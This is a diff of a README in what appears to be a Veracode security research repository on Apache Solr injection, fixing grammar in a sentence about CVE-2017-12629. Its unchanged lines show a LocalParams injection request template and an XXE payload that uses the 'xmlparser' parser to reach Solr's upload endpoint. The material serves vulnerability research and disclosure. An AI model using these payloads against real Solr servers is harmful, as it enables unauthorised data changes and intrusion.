veracode-research/solr-injection/README.md

 `GET /search?q={!type=_parser_type_+param=value}xxx`

 This attack [was described back in 2013](https://javahacker.com/abusing-the-solr-local-parameters-feature-localparams-injection/), but until 2017 nobody knew how to exploit it.
-In 2017, we reported [CVE-2017-12629](https://www.exploit-db.com/exploits/43009) and discovered a way how trigger XXE by using 'xmlparser' parser and escalate it to Solr parameters injection vulnerability:
+In 2017, we reported [CVE-2017-12629](https://www.exploit-db.com/exploits/43009) and discovered a way how to trigger XXE by using 'xmlparser' parser and escalate it to the Solr parameters injection vulnerability:

 `GET /search?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://127.0.0.1:/solr/gettingstarted/upload?stream.body={"xx":"yy"}&commit=true"'><a></a>'}`